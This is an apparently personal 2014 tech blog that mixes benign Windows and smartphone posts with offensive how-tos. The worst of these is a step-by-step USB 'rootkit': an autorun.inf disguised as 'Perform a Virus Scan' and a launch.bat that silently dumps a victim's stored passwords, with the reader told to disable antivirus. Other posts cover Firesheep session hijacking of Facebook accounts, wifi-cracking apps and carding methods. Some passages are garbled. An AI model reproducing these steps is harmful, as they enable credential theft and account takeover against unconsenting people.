Recent Articles

Sunday, April 13, 2014

Hack Facebook Through Firesheep

Sunday, April 13, 2014 - 0 Comments


shubucyber

  Recently a new firefox addon Firesheep have been a cause of thousands of email accounts, As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly last 24 hours, With Firesheep the hacker can control any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account.

What is Session Hijacking?
In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account.

How can a Hacker use Firesheep to Hack a Facebook or any other account? 
Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things :-


  •     Public wifi access
  •     winpcap
  •     Firesheep


Method :-

1. First of all download "Firesheep" from the above link and use the "openwith" option in the firefox browser

shubucyber

2. Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep.

shubucyber

3. Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly.

shubucyber




ENJOY BUT 
It's



How To Change Windows 8 Lock Screen


The Windows 8 lock screen is more than just a background image. On this screen, you’ll find apps and widgets that provide useful notifications and alerts, like the local weather forecast, social notifications, messages and new emails. In just a few simple steps, you can Change Windows 8 Lock Screen and customize it to your liking.

shubu cyber


Seeing the same picture on lock screen again and again may get boring, To see Different Pictures on lock screen that will be new to your eyes and which will also please your eyes, you need to change windows 8 lock screen, So here is how you can do it step by step.


Steps To Change Windows 8 Lock Screen :-
  1. Hover your mouse to the Right Corner of you screen, to show up charm bar.
  2. Check the bottom of the charmbar to find “Change PC Settings” Click on it from the Settings charm.
  3. Select Personalize > Lock Screen.
  4. Choose a background image from your computer, your camera, your SkyDrive account or Bing.



Once you select an image, your settings will be changed automatically. You also have the option of installing an app that will change your photo automatically each day or at set intervals. This is a great way to keep your lock screen fresh and interesting.


Wednesday, April 9, 2014

Hack Wifi From Android Apps

Wednesday, April 9, 2014 - 0 Comments


I am gonna tell you about some  Android Wifi Hacking App . That’s right, you can hack stuff right from your phone… if you know how. And you thought hacking could only be done on computers, Silly! The world is changing and now you can bring some of your hack ninja skills wherever you go. Of course, this list is provided for purposes of education, awareness, and knowing your enemy’s arsenal.


shubu cyber


Android Wifi Hacking Apps 

Wifi kill

Well, with this app you can disable internet connection for a device on the same network. So if someone (anyone) is abusing the internet wasting precious bandwidth for a Justin Bieber video clips you could just kill their connection and stay happy with a full bandwidth just for yourself. Although this has the potential to be a dangerous tool in the wrong hands (re: any hands that aren’t your own).
Download Wifi kill.


Wifi unlocker 2.0

Its a noteworthy Android Wifi Hacking App , the app is easy to use and you have want to be a tech geek to unlock or crack the wifi networks around you. its a tool which can be used in any circumstances to crack wifi network and let you surf the web for free.
Download  Wifi unlocker 2.0


Router keygen app

Its works with almost all Router/Wifi. His dictionary a 66Mb single file, which efficient than anything else available market. T should be downloaded SD card, though select the folder where menu. Alternatively use connection instead dictionary. T can be activated settings menu. natively the key although take about 2 minutes powerful phones and about 10 seconds Samsung Galaxy S
Download  Router keygen app



WiFi Keygen

It calculates  the default passwords, WiFi keygens shows you the WiFi router from your environment and the respective signal strength. Its also shows you immediately the compatible routers. This can be seen in a color-coded trick
Download  WiFi Keygen


Penetrate Pro

Penetrate Pro is an excellent Android app for WiFi decoding. its is an excellent Android app that calculates WEP / WPA keys for some wireless routers. Also, no advertising and 3G routers search based on Thomson.
Download  Penetrate Pro


Wifi Leaks

Wifi Leaks is an application similar to Router Keygen that allows to decipher any WiFi router that is within our reach protected with the WPA protocol.
Download  Wifi Leaks


I hope you enjoy this little overview of some Android Wifi Hacking App. Obviously this list is far from comprehensive … hey but may be you want to drop some other Android Wifi Hacking App so please you are most welcome in comment section... :)

Tuesday, April 8, 2014

How To Hide Drives Through CMD

Tuesday, April 8, 2014 - 0 Comments


Тоdау i will write a  tutоrіаl tо Hide Drives with CMD wіthout any thіrd раrtу расkаgе. Тhеrе аrеа sеvеrаl frее аnd duе sоftwаrе’s ассеssіblе tо hide local  drіvеs, hоwеvеr і аm nоt gоnnа mеntіоn to hіdе а local drіvе еmрlоуіng а расkаgе. In  thіs tutоrіаl і wіll shоw уоu an еаsіеst mеthоd tо hide nаtіvе drіvе with CMD. thіs mау sаvе уоur еасh саsh аnd tіmе.


Steps tо Hide Drives with CMD


  • Step 1. Сlісk оn Start – Run , if you are Using Windows 8, Then Click on start and search for Run, or just hold down windows key and press  ” R “.


  • Step 2. Run bох will appear, kіndly type ” сmd ” аnd hіt Еntеr.


  • Step 3. Now you will see Command promt windows, Type ” Dіskраrt ” аnd hіt Еntеr.


Note : In Windows 8 i was asked to confirm if i want to allow this program to make changes to this computer. Just click on yes and another Window will open up shortly.


  • Step 4. Now you have to type  ” lіst vоlumе ” аnd Hit Enter to see the list of all drives details.


  • Step 5. Now i have some personal data in my drive E which i dont want any other person to peep in, So i want to hide it, For that i will type ” Select volume E ”  and hit Enter.


Іf уоu wіsh tо hide  vоlumе D , Then you will type ” Select vоlumе D ” аnd hіt Еntеr. Now you can see something like below picture.

shubu cyber


By now you have selected the Drive successfully which you want to hide. But the last part which is to Hide the Drive is still remaining.


  • Step 6. To hide the drive you have to type “ Remove letter E ” and hit enter.


shubucyber


Congrats you have successfully Hidden the drive.


Read more »

Sunday, April 6, 2014

Top 5 Alternative Windows Search

Sunday, April 6, 2014 - 0 Comments

Do you struggle to find your desirable files in your PC? If yes, it’s normal because there are too many files and folders, right? But you can always use the Windows Default search option to solve your problem? Does it completely root out the problem? No, because the Windows Default search option takes a lot of time to display the search results.

To make your search results faster than ever, you need to use various Desktop Search tools available in the market. Here is a list of Top 5 Windows Search Alternative Tools, which provide you the best ever search:


shubu cyber



Search In Windows OS

Search Everything :-

Search Everything is a free Windows search utility, which helps you to locate files and folder with ultra-high speed. It is a portable tool that comes with an easy-to-use interface. It easily finds all your files and creates an index-database, while displaying the files in a simple format. The first search is a bit slow, but later on the software gives instant results. The software uses a small amount of memory. It gets launched with the system startup and runs in the system tray. The utility lets you perform advanced search by using wildcards, Boolean operators, and regular expression. Apart from this, you can even use the utility to download files via the remote Everything Program by enabling the server features that are inbuilt. Give it a shot, if you want extreme fast search results.


UltraSearch :-

UltraSearch is the product of JAM software, which offers essential features and delivers the search results in a few seconds. Unlike Search Everything it does not maintain an index, as it works directly on the Master File Table of the NTFS partitions. It comes in both 32-bit and 64-bit versions and display additional information like file size and last modification date in the search results. UltraSearch also includes the options to exclude folders and files via exclude filter. With a simple user interface, you can save last 100 search patterns and can even print the search results as text, RTF, HTML, or Excel file.


Super Finder XT :-

Super Finder XT is a free Search tool that comes with special functions, for example Smart Search Mode. It runs at a good speed and has an interface similar to that of MS- Office 2007 and 2010 versions. It is fully loaded with wildcard support and offers two different operating modes- simple and advanced along with two view modes- XT and Classic.  In addition, this software provides Plugin Support to implement new search features without re-installing it.


File Search EX :-

File Search Ex is a remarkable file search utility that comes with a simple interface similar to that of Windows XP with a little upgradation. It requires low system requirements and works well in locked computer configuration, thus requiring no Admin rights. It has a portable compatibility and runs quite well. It’s always better to specify the path for performing search, as FileSearch EX takes time to display the results


Locate 32 :-

Locate 32 is another free Search Utility, which has an interface similar to that of the advanced search dialog box of the Default Windows Search. You can use various parameters like file name, extension, location, and size to search your file. Initially, the software takes a little time, as it creates a database of your file names. Once the indexing has been completed, you can locate files quickly and easily. It creates a database structure to display the search results with fast speed.



Wednesday, April 2, 2014

Send Free SMS Without Using Any Internet Connection OR Any Packs

Wednesday, April 2, 2014 - 0 Comments


Send free SMS from your mobile phone without using any sms packs or internet connection and it's for all network...so just go on...

shubu cyber


          First step: Sign up at 160by2.com

          Second step: Now from your mobile type

#ACC(SPACE)MOBILE NUMBER
(SPACE)PASSWORD

And send it to 55444

Example: #ACC 9000000000
123456789 and send it to 55444


Now you are logged in to send free sms type:-

# send(space)receiver's number
(space)message and send it to
55444


Example: # send 9898989898 hello shub speaking and send it 55444


When the message will send and you will get the delivery report by sms on your mobile phone.


NOTE: Character limit 140 and Try it at low balance. First time you will be charged Rs1 for this service but u will get unlimited sms free daily.....enjoy ;)

Wednesday, March 19, 2014

Ways To Compromising The Security Of Your Smartphone Data

Wednesday, March 19, 2014 - 0 Comments


The ubiquity of internet-connected smartphones and other mobile devices can be a boon to user data privacy. The possible loss and theft of personal data stored in a mobile phone can even be far more devastating than the loss of the actual device.

Safeguard sensitive data in your smartphone by knowing the most common security blunders.




Suspicious Apps and SMS Text Messages

Be wary of the various ways you can get malicious software to latch on to your mobile device. Think twice before you carelessly open links in spammy SMS text messages. Another risky maneuver that can compromise the privacy of your smartphone data is downloading software from third-party app stores and other questionable sources.

The app stores of Apple and Google have a semblance of screening in place and therefore serve as more reliable sources of malware-free apps. To protect your smartphone data, use reliable app stores only.


Public Wi-Fi

Your carrier’s data plan may be too limiting and expensive. To save money, you then resort to the readily available and free public Wi-Fi system. If you carry sensitive information, such as proprietary corporate data, in a smartphone that you also use in the workplace, then avoid connecting to the internet via unsecured or open networks. Such wireless networks make the data in your mobile device especially susceptible to hacking.


Old App Versions

Always use the most recent app versions. When prompted to download updates and security patches, do it right away. Apps that are not up to date may still contain security flaws and code vulnerabilities, which can pose a threat to the sensitive data stored in your mobile device.


Lock Down

Locking down your mobile device by setting up a PIN or a password or using an advanced fingerprint scanner, such as the one on the iPhone 5S, can be your first line of defense in case you misplace your smartphone or if it gets stolen. It is true that PIN or password security methods can be cracked, but at least they provide a mantle of protection while you track down the whereabouts of your device.


Remote wiping and having the smartphone locked locally are your two best allies for protecting the data in a lost or stolen device. If your mobile phone is corporate-owned, for example, report the loss right away because there is a chance your company has the ability to remotely erase the data in it.


Sunday, March 16, 2014

Top 15 Tips For Online Safety & Security

Sunday, March 16, 2014 - 0 Comments



With more and more people gaining access to the Internet every day, the importance of ensuring that you and your information remain secure while using the Internet for personal or business reasons cannot be stressed enough.  Cyber attacks, viruses, malware, and unwanted intrusions into “secure” computing systems occur frequently and these issues cannot be completely eradicated.  The solution is to practice safe computing habits, educate yourself about security threats and prevention methods, and always use strategies and options that minimize your exposure to risk.

Here are some important tips for staying safe while using the internet and keeping your computer and your personal data as secure as possible :-

1>>   Disable the Auto-Run feature in Windows.  This built-in Windows component allows silent programs to execute without your knowledge because auto-run grants them permission to initiate without obtaining active consent.

2>>  Always have an anti-virus program on your computer and keep it updated.  There are plenty of free or very inexpensive anti-virus programs available, so you have no excuse for not having one.  Make sure you set the program up to do a full scan at least once a week.

3>>  Do not turn off the Firewall options on your computer, even if a program claims the Firewall needs to be disabled for the program to work.  Firewall settings allow you set program-specific exceptions without disabling the protection altogether.

4>>  When choosing passwords for online sites or online accounts (bank accounts, Pay Pal, etc.), make sure you never use the same password for multiple sites, use a mixture of upper and lower case letters and numbers (and symbols if they are allowed), avoid using personal information (birth date, maiden name, social security number), never use a password of less than 10 characters, and combine words or create nonsensical ones.  The harder your password is for you to remember, the more difficult it will be for someone else to guess it!

5>>  Update the core components of your computer’s software regularly, or set the system to automatically find and download updates.  The most common example of this is Windows Update for Microsoft operating systems.

6>>  While it is tempting to download free movies, music, and software from torrent sites, it can also be very harmful to your computer.  Torrent content is generally unverified and frequently contains viruses or other harmful malware.

7>>  E-mail has become a common way for viruses, scams, and phishing activities to obtain information or compromise your computer.  When reading your e-mails, never click on an embedded link in the message unless you know the destination (you can find this out by hovering your mouse over the link).  This applies to messages from people you know, also, because most web-based e-mail accounts (Yahoo!, Gmail, etc.) can be compromised.

8>>  Disable Java (not JavaScript) in your internet browser.  Exploits through Java occur frequently, even though Java itself it almost never needed when using the internet.

9>>  While Internet Explorer is very popular, it lacks a feature included in Mozilla Firefox that makes Firefox a safer browser to use, particularly if you are susceptible to JavaScript threats.  Firefox has a NoScript add-on that blocks all JavaScript programs from sites that you have not approved.

10>>  Back up important data on your computer to an external drive or storage location (an online “cloud” or flash drive) regularly to prevent total loss in the event your computer is stricken with a virus or other harmful malware.

11>>  System recovery questions ask for basic information like your mother’s maiden name, the name of your hometown, or your pet’s name.  This information is also likely contained somewhere on your Facebook page.  When providing recovery responses, treat them like passwords and never provide actual information that can be freely found elsewhere on the internet.

12>>  Never open or run executable files directly from the internet.  Download them to your computer’s hard drive or an external storage device and perform a virus scan first.

13>>  Establish more than one e-mail address for multiple purposes.  For example, you could have one e-mail address known only to close friends and family members, another for online banking and financial transactions, and another for online gaming purposes.  This reduces the amount of potential spam, malware threats, and phishing risks you are exposed to.

14>>  If you have a supplemental firewall program such as Comodo or ZoneAlarm that asks for permission when an unknown program is attempting to download a file, connect to your computer, or execute a program, never allow the action unless you know what the program or file is first and are sure it is from a trusted source.

15>>  When using social media such as Facebook, be cautious about what personal information you share.  What you post on the internet is visible to everyone and can be used in a harmful or damaging way.  Another Facebook tip is to avoid accepting friend requests from people you don’t know personally.  While it may be “cool” to have 10,000 friends, how many of them are you positive you can trust with your personal information?

shubucyber


Protecting your sensitive or confidential information and keeping your computer or internet-enabled mobile device safe from unwanted intrusions is essential in our internet-driven society.  Follow the tips provided here and continue to educate yourself further about ways to stay secure while using the internet, regardless of what your online activities consist of or how you access the online world.  When it comes to internet security, an ounce of prevention truly is worth a pound of cure.


Tuesday, March 11, 2014

How Hacker's Hack Credit Card

Tuesday, March 11, 2014 - 1 Comment


shubucyber


A hacker has many ways to gain a credit card number from an innocent user. The most common one is known as phishing. In this technique, the hacker poses as an officer within an organization, let's say VISA. The hacker sends to a group of email accounts an alert, instructing the receiver to follow determined set of instructions before his credit card is cancelled.

If the user is not aware of this kind of fraud, he will insert his credit card number, his name and expiration date without knowing he is going to be a victim of an online crime.

Another way for hacking credit card numbers is through a website. The hacker only needs to hack the systems of an online retailer, let's say, Costco, and search for the database where the retailer stores the information of all of the users who have made recent transactions.

The third way is through the online process of buying. Let's say an adult finds a website with adult content that he or she finds attractive. It's quite probable that the website is only a masquerade for acquiring credit card information from you.



What Is A Carder ?

                A carder is a criminal who specializes in stealing information from credit cards. Although the majority of them buy the information from online vendors, some of them are quite savvy on how to access that information by themselves.

In the physical world, a carder will steal the information from a user while doing a face to face transaction. The criminal only needs to pass the card through a special scanner. This device will read from the magnetic strip all of the credit card information. Afterwards, the carder will trespass that information to a blank card available in many identity card stores.

In the virtual world, credit card hacking is a bit more sophisticated and automatized. A hacker could install inside your system a credit card hacking software known as Bugbear. This program is a keystroke logger; it captures the keys that you have pressed in your keyboard and after some time, it transmits this information to the hacker. The criminal will navigate through this data, searching for any private information that can give him access to your credit card.

Besides Bugbear, there is also the IRC bot. This automated software is used for determined functions, like a moderator for a chat room. But if it is used by a hacker, he may use it for stealing your credit card information. The IRC bot will pose as an official from a company, asking you to insert your credit card information.

Another mean that hackers use for stealing money from your credit card is through unused ebay accounts. Once they find a possible victim, the hacker uses a program that starts bombarding the account until it breaks it. Once inside, the hacker will use it for posing as the real user, selling equipment that will never reach the buyer once he buys it.

The URL in this case would be having website address like www.icicibank.ripway.com instead of www.icicibank.co.in.



Suggestion:- “ There is only way to secure your credit cards and bank accounts from the hackers is that to have a eagle eye on the URL before putting your password and important details”



How To See Hidden Files, Using DOS..


See Hidden Files, Using DOS..in simple two steps...

shubucyber


  • Open RUN (type CMD) hit enter.
  • At command prompt just type dir /ah   if the list is too long you can use dir /ah/p/w


Monday, March 10, 2014

Hack Password Through USB drive Or Pendrive

Monday, March 10, 2014 - 0 Comments

shubucyber

In this article I will show you how to hack Passwords using USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as Facebook, MSN, Yahoo, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. We need the following tools to create our rootkit.



MessenPass :-

 Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.


Mail PassView :-

 Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.


IE Passview :-

 IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0


Protected Storage PassView :-

 Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…


PasswordFox :-

 PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.


Here is a step by step procedure to create the password hacking toolkit.


NOTE:-  You must temporarily disable your antivirus before following these steps.


1.    Download all the 5 tools from HERE, extract them and copy only the executables (.exe files) into your USB Pendrive.

i.e. Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.


2.    Create a new Notepad and write the following text into it

[autorun] open=launch.bat

ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.


3.    Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt


save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.



Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps :-


Step 1:-    Insert the pendrive and the autorun window will pop-up.

(This is because, we have created an autorun pendrive).

Step 2:- In the pop-up window, select the first option (Perform a Virus Scan).

Step 3:- Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

Step 4:- Remove the pendrive and you'll see the stored passwords in the .TXT files in your pendrive.


This hack works on Windows 2000, XP, Vista and Windows 7

Warning : - This procedure will only recover the stored passwords (if any) on the Computer.


Sunday, March 2, 2014

Change Your Ip In Less Then 1 Minute

Sunday, March 2, 2014 - 0 Comments


Internet Protocol
Image Credit :- http://www.ezivera.com/


1.    Click on "Start" in the bottom left hand corner of screen
2.    Click on "Run"
3.    Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "OK" button here
14. Hit the "OK" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically" tongue.gif
18. Hit "OK"
19. Hit "OK" again
20. You now have a new IP address


With a little practice, you can easily get this process down to 15 seconds.


NOTE:- This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back.

Reference :-   Ezivera


Thursday, February 27, 2014

How To Convert FAT to NTFS

Thursday, February 27, 2014 - 0 Comments





Your hard drive must be formatted with a file system such as FAT, FAT32 or NTFS so that Windows can be installed on to it. This system determines how files are named, organised and stored on the drive. If you’re not using it already, NTFS (New Technology File System) is recommended for Windows XP because of the additional functionality it offers. If your PC came with Windows XP pre-installed then there’s a chance that you’re already using NTFS. If you’ve upgraded from Windows 98 or Windows Me you may still be using FAT or FAT 32. The option to change over to NTFS would have been available during the upgrade process. Don’t worry if you skipped this as it’s possible to convert at any time from within Windows XP without losing any data.


The recommended option

There are a number of features in Windows XP that will only work if the NTFS file system is present, which is why it’s suggested you make use of it. File and folder permissions, encryption and privacy options are just some of those you’ll be able to access. In particular, those of you who have set up user accounts will find NTFS invaluable. For instance, if you continue to use FAT or FAT32 anyone with physical access to the drive will be able to access the files and folders that are stored there. However, with NTFS you’ll be able to use a level of encryption (Professional Edition only) that will enable you to protect your data.

You’ll also find NTFS more reliable in that it’s more able to recover from disk errors than its FAT or FAT32 counterparts. A log of all disk activity is kept so should a crash occur, Windows XP can use this information to repair the file system when your PC boots up again. To find out what file system you’re using, open My Computer, right-click your main hard drive and choose Properties. Take a look at the General tab to see confirmation of the file system that’s in use.


Convert now

You can use the convert tool in Windows XP to change the file system on your hard disk from FAT or FAT32 to NTFS. The whole process is safe and your existing data won’t be destroyed. To begin, click Start -> Run, type cmd and press [Return]. At the command prompt type convert c: /fs:ntfs and press [Return] (where ‘c’ is the letter of the drive you’re converting). When you try and run the convert utility, it’s likely that Windows XP will be using your paging file so the process won’t be completed immediately. Therefore, you’ll see a brief message on screen informing you that the conversion will take place instead the next time Windows starts up. Having restarted, the Check Disk utility will run, the conversion will be performed automatically and you may find that your PC will reboot twice more.


The benefits

With your drive now running NTFS, it’s time to take advantage of the new options that are available. Having created a number of different user accounts you can now control the level of access that’s granted to individual users. For example, there are going to be certain files and folders that you’ll want some users to be able to access but not others. If you have Windows XP Professional Edition you can do this immediately.

Right-click any file or folder, choose Properties and select the Security tab. A dialog will be displayed showing the names of all your users. Alongside will be two columns which enable you to select levels of access for each of them, the permissions include Full Control, Modify, Read and Write. You can then check the appropriate box to determine whether or not to Allow or Deny a particular permission. For Windows XP Home Edition users, the Security tab won’t be immediately available. To access this option you’ll need to restart your PC, pressing [F8] until a menu appears. Next select Safe Mode and wait for Windows XP to start up. You can then set your options in the same way.

Another feature is NTFS compression. It’s quick and seamless as your file or folder is decompressed automatically when you access it. (Don’t confuse this with a Zip compression utility where the files need to be extracted before they can be accessed.) Although you may have used NTFS compression on a file or folder, there’s no way of telling just by looking at it. To remedy this, open My Computer, click Tools -> Folder Options and select the View tab. Under Advanced settings, scroll down and check the option ‘Show encrypted or compressed NTFS files in color’, then click Apply and OK. Take a look at your compressed items in My Computer and you’ll see the text label has changed from black to blue. Something else that’s exclusive to Professional Edition users is the Encrypting File System (EFS). You can use this to protect your important data so that no one else can read it. Your encrypted files and folders will only be accessible when you have logged into your user account successfully...


Monday, February 24, 2014

Chat With Friends Through Command Prompt

Monday, February 24, 2014 - 1 Comment


Hello Friends, With the help of this article you can chat with command prompt with anyone...




1)     All you need is your friend's IP address and your Command Prompt.

2)     Open Notepad And Write This Code As It is :

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


3)     Now Save This As "Messenger.Bat".

4)     Open Command Prompt.

5)    Drag This File (Messenger.bat file) Over The Command Prompt And Press Enter.

6)    You Would Then See Something Like This:



7)     Now, Type The IP Address Of The Computer You Want To Contact And Press Enter
You Will See Something Like This:



8)    Now all you need to do is type your message and press Enter.
Start Chatting.......!




ENJOY YOUR CHATTING



Wednesday, February 19, 2014

Top Best Smartphones

Wednesday, February 19, 2014 - 0 Comments


Best Overall Smartphone: Samsung Galaxy Note 3



          The Galaxy Note 3 is so powerful and long-lasting you may not need a tablet. This Android device packs a big and bright 5.7-inch display, and you can take notes with ease using the built-in S Pen. The Note 3 is also a multitasking maestro, thanks to its blazing Snapdragon 800 processor. With Samsung's Multi Window feature, you can run two apps side by side and drag content between apps. You can even run a third app on top of all that with the Pen Window feature. The best part about this phablet is its staying power, offering more than 10 hours of battery life.


Best Compact Smartphone: Apple iPhone 5s



          Other than a new gold color option, the iPhone 5s doesn't seem much different from its predecessor. However, the A7 chip inside this sleek beast blows the doors off of most Android phones, and there's a growing number of games and apps that take advantage of its 64-bit architecture. Another reason to snatch up the iPhone 5s is its awesome iSight camera; with larger pixels and a dual-LED flash, this 8-megapixel smartphone captures fantastic photos indoors and out. Add in a TouchID sensor that makes it a cinch to unlock your phone and make purchases, and it's easy to see why the iPhone 5s is one of the best smartphones.


Best Value: Motorola Moto X



          Say "OK, Google Now" to the Moto X, and you’ll unleash this smartphone's greatest power. This device can answer all sorts of questions ("What's the weather today?") and execute commands ("Send text to John") without you lifting a finger. The secret is the Moto X's dedicated natural language processor. This smartphone wows in other ways, including the ability to customize your own design online, an eye-popping 4.7-inch HD screen, and active notifications that deliver alerts before you even unlock the phone. Although the camera could be better, the sub-$100 price of the Moto X makes it a fantastic value.


Best Sound: HTC One



           The HTC One is a smartphone that delights the senses, starting with sound. The BoomSound speakers on the front of this flagship device pump out awesome audio, whether you're listening to music or playing a game. The 4.7-inch 1080p screen is a sight to behold, too; it's not only sharp but very bright with wide viewing angles. And don’t forget about touch. The premium aluminum design on this beauty puts plastic phones to shame. HTC also added a new BlinkFeed feature that delivers a personalized stream of news and social updates right to your home screen.


Best Features: Samsung Galaxy S4



           Packing an incredible amount of features, the Galaxy S4 can answer the phone or change music tracks with hand gestures, control your TV, and even double as a voice translator. This Android flagship also boasts a big and colorful 5-inch AMOLED screen in a surprisingly lightweight 4.6-ounce design. The camera provides a full bag of neat tricks, including the ability to erase photo-bombers and stick together slick-looking sequence shots. No, the design isn’t as gorgeous as the iPhone 5s, but it allows you to replace the battery and expand the memory.


Best Advanced Camera: Nokia Lumia 1020



           For photographers, the Nokia Lumia 1020 represents the pinnacle of smartphones. The 41-megapixel camera sensor not only takes breathtaking photos, but lets you zoom in after the shot to reframe your photo and still enjoy amazing detail. Shutterbugs will also appreciate the Lumia 1020's sophisticated camera app, which lets you adjust white balance, shutter speed and focus on the fly. Plus, Windows Phone's dynamic Live Tile interface really pops on this handset's 4.5-inch AMOLED screen.


Best Off-Contract Phone: Google Nexus 5



It's not just a device for Android purists. The Nexus 5 is simply one of the best smartphone values anywhere. For just $349 off-contract, you get cutting-edge specs such as a Snapdragon 800 processor and a 5-inch 1080p display. Android 4.4 KitKat brings some cool new features to the table, too, including the ability to perform searches, send text messages and more using just your voice from the home screen. We also love the new dialer, which integrates a local business search field right into the app. Although its camera isn't best-in-class, the Nexus 5 is one heck of a value.


Best Innovative Phone Design: LG G Flex



The LG G Flex is the world’s first smartphone that’s not only curved but flexible. This makes the handset more comfortable when holding it up to your face to make calls, and you can literally apply up to 80 pounds of pressure to the back without worrying about breakage. The G Flex also has a self-healing chassis, so you can scratch the back with keys and the marks will start to disappear within minutes. Although the 720p display isn’t full HD, the OLED panel offers fantastically rich color and wide viewing angles. A long-lasting 3,500 mAh battery and swift Snapdragon 800 CPU are two more reasons to snatch up this innovative smartphone, but you’ll pay a premium versus some other flagships.


Cyber funding delivered to you daily

© 2013 Shubu Cyber. All rights reserved.
Templates Designed by Shubhendu Sachi